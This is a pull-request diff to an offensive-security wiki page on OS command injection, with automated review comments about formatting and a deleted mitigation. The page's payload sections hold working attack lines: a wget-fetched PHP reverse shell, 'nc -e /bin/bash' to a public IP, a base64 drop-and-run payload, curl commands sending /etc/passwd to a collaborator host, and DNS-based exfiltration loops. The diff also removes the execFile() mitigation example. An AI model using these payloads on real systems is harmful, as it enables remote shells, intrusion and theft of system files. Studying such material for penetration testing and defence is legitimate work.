67 changes: 42 additions & 25 deletions src/pentesting-web/command-injection.md
@@ -12,6 +12,9 @@ Depending on **where your input is being injected** you may need to **terminate

## Command Injection/Execution

<details>
<summary>Common command chaining payloads</summary>

```bash
#Both Unix and Windows supported
ls||id; ls ||id; ls|| id; ls || id # Execute both
@@ -32,27 +35,49 @@ ls${LS_COLORS:10:1}${IFS}id # Might be useful
< /etc/passwd #Try to send some input to the command
```

### **Limition** Bypasses

If you are trying to execute **arbitrary commands inside a linux machine** you will be interested to read about this **Bypasses:**


{{#ref}}
../linux-hardening/bypass-bash-restrictions/
{{#endref}}
</details>

### **Examples**

```
```bash
vuln=127.0.0.1 %0a wget https://web.es/reverse.txt -O /tmp/reverse.php %0a php /tmp/reverse.php
vuln=127.0.0.1%0anohup nc -e /bin/bash 51.15.192.49 80
vuln=echo PAYLOAD > /tmp/pay.txt; cat /tmp/pay.txt | base64 -d > /tmp/pay; chmod 744 /tmp/pay; /tmp/pay
```

### Terminate and comment out trailing shell tokens (avoid exporter pipelines)

Many real systems build a shell pipeline around your input (e.g., `mktemp`, `chmod`, `tar`, `du -s`, etc.). If you only inject a command separator like `; <cmd>`, the shell will continue parsing the exporter’s trailing tokens, often breaking your payload with syntax/path errors.

Technique:
- Use `;` to end your injected command.
- Immediately add `#` to comment out everything that the application appends after your input on that same line (POSIX shells treat `#` as comment-until-newline).

Generic shape when the parameter is embedded unquoted in a shell:

```json
{
"dir": "/tmp/x-; curl -s --data-binary @/etc/passwd http://<collaborator>/; #"
}
```

Notes:
- This works when your data is evaluated by a shell and not kept inside quotes. If the input is quoted, first break out of the quotes with `'` or `"` as needed, then apply `; ... ; #`.
- If the app appends tokens on a new line, comment until newline may not cover them; in such cases, inject a newline first and then a `#` line.

Quick blind RCE confirmation (HTTP OOB):

```bash
curl -s --data-binary @/etc/passwd http://<collaborator>/
```

### Parameters

Here are the top 25 parameters that could be vulnerable to code injection and similar RCE vulnerabilities (from [link](https://twitter.com/trbughunters/status/1283133356922884096)):

<details>
<summary>Common parameter names to test</summary>

```
?cmd={payload}
?exec={payload}
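Review bot: the `</details>` is placed after the `### **Limition** Bypasses` subsection and its `{{#ref}}` block, so an H3 heading and a cross-reference end up inside collapsed content and vanish from the page outline; move `</details>` up to directly after the closing fence of the payload list so that only the payload block is collapsible. Two smaller points in the new "Terminate and comment out trailing shell tokens" subsection: "exporter pipelines" in the heading is jargon from one specific target (a backup/export handler) and reads oddly in a generic page, so consider "application-appended tokens"; and the "Quick blind RCE confirmation (HTTP OOB)" block repeats the exact `curl -s --data-binary @/etc/passwd http://<collaborator>/` already embedded in the JSON example above it, so either drop it or have it show something the JSON example does not (for example, what to look for on the collaborator side). Since this hunk touches the `### **Limition** Bypasses` line, also fix the typo to `Limitation`.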
@@ -81,11 +106,13 @@ Here are the top 25 parameters that could be vulnerable to code injection and si
?print={payload}
```

</details>

### Time based data exfiltration

Extracting data: char by char

```
```bash
swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
real 0m5.007s
user 0m0.000s
@@ -101,13 +128,13 @@ sys 0m0.000s

Based on the tool from `https://github.com/HoLyVieR/dnsbin` also hosted at dnsbin.zhack.ca

```
```bash
1. Go to http://dnsbin.zhack.ca/
2. Execute a simple 'ls'
for i in $(ls /) ; do host "$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done
```

```
```bash
$(host $(wget -h|head -n1|sed 's/[ ,]/-/g'|tr -d '.').sudo.co.il)
```

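Review bot: tagging the dnsbin block as ```bash is wrong for its first two lines, `1. Go to http://dnsbin.zhack.ca/` and `2. Execute a simple 'ls'`, which are prose steps rather than shell; a syntax highlighter will flag them and any code-block linter run over the repo will fail on them. Move the two steps into a numbered list above the fence and keep only the `for i in $(ls /) ; do host "$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done` loop inside the fence. The `$(host $(wget -h|head -n1|sed 's/[ ,]/-/g'|tr -d '.').sudo.co.il)` block below it is correctly tagged ```bash.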
@@ -120,7 +147,7 @@ Online tools to check for DNS based data exfiltration:

#### Windows

```
```powershell
powershell C:**2\n??e*d.*? # notepad
@^p^o^w^e^r^shell c:**32\c*?c.e?e # calc
```
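Review bot: ```powershell is the wrong language tag for this block. `@^p^o^w^e^r^shell c:**32\c*?c.e?e` uses `^` as an escape character and a leading `@` to suppress echo, both cmd.exe/batch syntax with no equivalent meaning in PowerShell, and both lines are typed at a cmd.exe prompt to launch `powershell` with a wildcard-obfuscated path that PowerShell then expands (`C:**2\n??e*d.*?` for notepad, `c:**32\c*?c.e?e` for calc). Tag the block ```cmd or ```bat so the caret-obfuscated line renders as what it is, or ```text if the highlighter has no batch support.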
@@ -146,16 +173,6 @@ exec(`/usr/bin/do-something --id_user ${id_user} --payload '${JSON.stringify(pay

`exec()` spawns a **shell** (`/bin/sh -c`), therefore any character that has a special meaning to the shell (back-ticks, `;`, `&&`, `|`, `$()`, …) will result in **command injection** when user input is concatenated in the string.

**Mitigation:** use `execFile()` (or `spawn()` without the `shell` option) and provide **each argument as a separate array element** so no shell is involved:

```javascript
const { execFile } = require('child_process');
execFile('/usr/bin/do-something', [
'--id_user', id_user,
'--payload', JSON.stringify(payload)
]);
```

Real-world case: *Synology Photos* ≤ 1.7.0-0794 was exploitable through an unauthenticated WebSocket event that placed attacker controlled data into `id_user` which was later embedded in an `exec()` call, achieving RCE (Pwn2Own Ireland 2024).

### Argument/Option injection via leading hyphen (argv, no shell metacharacters)
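Review bot: deleting the `**Mitigation:**` paragraph and its `execFile()` block leaves the `exec()` subsection with a description of the bug and the Synology Photos case but no fix; the sentence immediately above still explains that `exec()` spawns `/bin/sh -c` and that shell metacharacters are the problem, so the reader now has nothing to contrast that with. Keep the paragraph and the `execFile('/usr/bin/do-something', ['--id_user', id_user, '--payload', JSON.stringify(payload)])` example, or, if the intent is to keep the page offensive-only, fold it into a `<details>` like the other blocks in this PR rather than drop it. The subsection that follows, `### Argument/Option injection via leading hyphen (argv, no shell metacharacters)`, builds on exactly that argv-array call pattern, which is another reason to keep the example in place.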
@@ -178,7 +195,7 @@ What to try:

Generic PoC shapes against centralized CGI dispatchers:

```
```http
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Content-Type: application/x-www-form-urlencoded

@@ -199,12 +216,12 @@ https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_inject

## References

- [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection)
- [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection)
- [https://portswigger.net/web-security/os-command-injection](https://portswigger.net/web-security/os-command-injection)
- [Extraction of Synology encrypted archives – Synacktiv 2025](https://www.synacktiv.com/publications/extraction-des-archives-chiffrees-synology-pwn2own-irlande-2024.html)
- [PHP proc_open manual](https://www.php.net/manual/en/function.proc-open.php)
- [HTB Nocturnal: IDOR → Command Injection → Root via ISPConfig (CVE‑2023‑46818)](https://0xdf.gitlab.io/2025/08/16/htb-nocturnal.html)
- [Unit 42 – TOTOLINK X6000R: Three New Vulnerabilities Uncovered](https://unit42.paloaltonetworks.com/totolink-x6000r-vulnerabilities/)
- [CVE-2025-52665: Unauthenticated RCE in UniFi Access backup/export via dir command injection](https://www.catchify.sa/post/cve-2025-52665-rce-in-unifi-os-25-000)

{{#include ../banners/hacktricks-training.md}}
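Review bot: the new `CVE-2025-52665` UniFi Access reference appears to be the source for the new `### Terminate and comment out trailing shell tokens` subsection (the `dir` parameter in the JSON example and the "backup/export" wording match its title), but that subsection does not link it; add the inline link there so the claim about how the application appends tokens after the input is traceable. Separately, the PayloadsAllTheThings entry is shown as both removed and re-added with no visible difference, so the change is whitespace only; worth confirming the final file contains a single copy of that line.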
@@ -1,4 +1,6 @@
## LESS Code Injection leading to SSRF & Local File Read
# LESS Code Injection leading to SSRF & Local File Read

{{#include ../../../banners/hacktricks-training.md}}

LESS is a popular CSS pre-processor that adds variables, mixins, functions and the powerful `@import` directive. During compilation the LESS engine will **fetch the resources referenced in `@import`** statements and embed ("inline") their contents into the resulting CSS when the `(inline)` option is used.

@@ -59,4 +61,5 @@ curl -sk "${TARGET}rest/v10/css/preview?baseUrl=1&lm=${INJ}" | \

* [SugarCRM ≤ 14.0.0 (css/preview) LESS Code Injection Vulnerability](https://karmainsecurity.com/KIS-2025-04)
* [SugarCRM Security Advisory SA-2024-059](https://support.sugarcrm.com/resources/security/sugarcrm-sa-2024-059/)
* [CVE-2024-58258](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-58258)
* [CVE-2024-58258](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-58258)
{{#include ../../../banners/hacktricks-training.md}}
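Review bot: the footer include is appended directly after the last list item `* [CVE-2024-58258](...)` with no blank line, so Markdown may treat the included banner content as a lazy continuation of that bullet; add a blank line before `{{#include ../../../banners/hacktricks-training.md}}`, matching command-injection.md in this same PR, where a blank line separates the references from the footer include. The CVE line showing as removed and re-added is presumably the missing trailing newline being fixed, which is fine.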